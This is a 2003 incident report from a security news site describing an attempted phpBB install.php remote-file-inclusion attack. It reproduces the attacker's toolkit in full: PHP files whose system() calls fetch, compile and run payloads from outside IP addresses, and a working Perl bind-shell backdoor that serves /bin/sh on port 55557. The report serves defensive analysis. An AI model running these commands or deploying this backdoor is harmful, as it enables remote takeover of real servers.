R o o t s e c u r e . n e t
The Security News Site For Systems Administrators & Hackers Tuesday, 21st May 2013 @ 19:06:46 GMT 
Rootsecure Homepage
About RootSecure
Lite Edition
User Area
Audio News
Daily Newsletter
Site News Archives
Sources News Archive
SecNews RSS Feeds
SecNews Console
Links:
   Videos
   Security
   Hacking
   Wireless
Downloads:
   Other
   Perl Scripts
   Audio Clips
   Win32 Tools
   Media Archive
   PDF Documents
Reports
Hacker Gear
Win' Error Pic's
ASCII Generator
Your IP Address
RootSecure:
   Contact
   Search
   Publicity
   Affiliates
   Attack Statistics
   Syndication
   (RSS/XML Feed)
   Privacy Policy

Hits: 134,489,371
(Since 06/09/02)
Admin Telnet
HoneyPot Project
Reports | Attempted 'hack' against Rootsecure.net
{10th Jun 2003}
Logs for Rootsecure.net recently revealed an attempt to compromise the site, using a phpBB vulnerability (from phpbb.com, ?phpBB is a high powered, fully scalable, and highly customisable open-source bulletin board?).  Here follows an account of the incident.

On the 28th of May, 2003 someone on the IP address of 57.66.3.54 (part of a block allocated to ?SITA-Societe Internationale de Telecommunications Aeronautiques? a French provider of ?Global information and communication software?) requested the page: http://www.rootsecure.net/forum/install.php?phpbb_root_dir=http://57.66.3.54/ass/

It appears the attacker was attempting to compromise Rootsecure.net using the ?Malicious PHP Source Injection in phpBB (install.php)? vulnerability discovered in April, 2002.

The first, and only hit of significance was an attempt to see if Rootsecure.net had forum software / it was vulnerable.  This would have been indicated to the attacker, by the page specified http://57.66.3.54/ass/ being ?php included? (downloaded and shown) on their screen, as the result of a HTTP ?GET? request.

After feeding the address ?http://57.66.3.54/ass/? left by the attacker, into a browser what looked like a custom phpBB ?hacking? toolkit was discovered:


  =Load.htm=

<?print "<pre>";

//system("wget");
//system("lynx");
//system("");
//system("cd /tmp;lynx -source http://57.66.3.129/bd.pl>bd.pl");
//system("cd /tmp;lynx -source http://62.118.154.149/1.c>1.c");
//cd /tmp;wget http://57.69.141.156/;

system("uname -a");

//system("cd /tmp;wget http://57.66.3.129/bd.pl;wget http://57.66.3.129/1.c;gcc 1.c -o ex;rm 1.c");

//system("cd /tmp;perl bd.pl");

//system("cd /tmp;lynx -source http://213.145.45.103/1.c>1.c;gcc 1.c -o ex");

//system("lynx -source http://213.145.45.45/bd.pl>/tmp/bd.pl");

system("cd /tmp/;ls");

print "</pre>";
?>

  =functions_selects.htm=

<?
system("cd /tmp;wget http://57.66.3.97/bd.pl;wget http://57.66.3.97/ex.c;gcc ex.c -o ex;rm ex.c;perl bd.pl");
?>

Scripts to download backdoor applications, and execute them on the remote system.

  =bd.pl=

#!/usr/bin/perl
use Socket;
$p=55557;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($p,INADDR_ANY));
listen(S,50);
while(1)
{
accept(X,S);
if(!($pid=fork)){
if(!defined $pid){exit(0);}
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
exec("/bin/sh -i");
close X;
}
}

Actual backdoor application coded in Perl.  If successfully run it would have opened a socket listening on port 55557 for the attacker to connect to, (using telnet or similar) and execute any command of their choosing.